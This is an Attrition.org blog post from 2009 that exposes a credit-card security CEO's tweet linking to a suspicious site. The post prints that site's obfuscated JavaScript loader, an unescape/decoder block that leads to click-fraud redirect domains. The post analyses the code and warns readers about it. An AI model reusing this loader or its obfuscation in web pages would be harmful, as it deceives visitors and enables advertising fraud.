Retriever Software - Providing real time spamming via Twitter

Sun Jul 19 01:17:53 EDT 2009

@attritionorg


"We like to say that, yes, our technology is better, but it’s our people that make the difference." - Retriever Credit Card Services

Cliff Torrence is the Founder/President/CEO of Retriever Credit Card Services. If you believe their web page, they have 10 years of experience in security, compliance management and payment processing.


By "making the difference", apparently they mean the CEO is sending a shortened URL about USAA having a credit card breach. It seems clear that either his Twitter account has been compromised and someone is sending out links to further boost adword revenue, or he posts links to his Twitter feed without even reading them. Notice his tweet that uses a bit.ly shortened URL. This service, like every other one (except tinyurl.com) does not offer a native 'preview' method. You click a link and off you go to some page that you hope isn't BAD™. Twitter clients such as Twhirl do not allow you to preview, but Twitter's native search does. Unfortunately, about 803 billion people (true statistic!) use Twitter clients to read and click links, not the search page.


Looking at the URL Cliff Torrence expects his followers to read, you see that it is fishy with "zge021.myftpsite.net" at the end.

Clicking on that link loads a simple page with fun wording like "courteously, without my, Infestation Responsible For" and a jumble of text that vaguely resembles a blog post (by a 4 year old monkey). This page also calls "r.js" which goes through some effort to obscure it's purpose:

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%20%66%75%6E%63%74%69%6F%6E%20%74%69%67%75%67%6C%6A%72%69%28%73%6C%6D%29%20%20%7B%20%20%20%20%76%61%72%20%20%20%6B%76%74%3D%75%6 E%65%73%63%61%70%65%28%20%73%6C%6D%2E%73%75%62%73%74%72%28%20%30%2C%20%73%6C%6D%2E%6C%65%6E%67%74%68%2D%31%29%20%29%3B%20%20%76%61%72%20%73%64%6A%3D%27%27%3B%20%20%66%6F%72%28%74%3D%30%3B%20%20%74%3C%6B%76%74%2E%6C%65%6E%67%74%68%3B%74%2B%2B%29%20%20%73%64%6A%2B%3D%20%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%20%20%6B%76%74%2E%63%68%61%72%43%6F%64%65%41%74%28%74%29%2D%20%20%73%6C%6D%2E%73%75%62%73%74%72%28%20%73%6C%6D%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%20%20%75%6E%65%73%63%61%70%65%28%73%64%6A%29%29%3B%20%7D%20%20%3C%2F%73%63%72%69%70%74%3E'));tigugljri('%286FVFULSW%2853odqjxdjh%286G%2855mdydvfulsw%2855%286Hgrfxphqw1zulwh%285%3Bxqhvfdsh%285%3B%285%3A%28586F%285886%285876%285885%28587%3C%285883%285887%285853%285887%28588%3C%285883%285878%28586G%285855%2858%3A7%285898%2858%3A%3B%2858%3A7%28585I%28589D%285894%2858%3A9%285894%2858%3A6%285896%2858%3A5%28589%3C%2858%3A3%2858%3A7%285855%285853%285853%285886%285885%285876%28586G%285855%28589%3B%2858%3A7%2858%3A7%2858%3A3%28586D%28585I%28585I%2858%3A%3A%2858%3A%3A%2858%3A%3A%28585H%28589D%28589I%28589%3B%28589H%285898%285895%2858%3A5%28589%3C%28589F%28589I%28585H%285895%28589%3C%2858%3AD%28585I%285898%285895%2858%3A5%28589%3C%28589F%28589I %285855%28586H%285853%285853%28586F%28585I%285886%285876%285885%28587%3C%285883%285887%28586H%285%3A%285%3C%285%3C%286E%286F2VFULSW%286H%283D3');

Through painful decoding and following links, courtesy of Sullo, it turns out this is likely an elaborate key word based advertising revenue setup that ends at j0hnebril0.biz (partially obfuscated with zeros) and involves 0ffersfine.c0m and y0ufindm0re.c0m.

Long story short: Cliff Torrence and Retriever Credit Card Services should explain why they are posting this crap to their Twitter feed. Are they in on it and getting kick backs from click-through fraud/scams/whatever?

As always, use preview.tinyurl.com for your URL shortening needs. Enable the 'preview' mode for all TinyURL links to help you understand what you are about to read.


main page ATTRITION feedback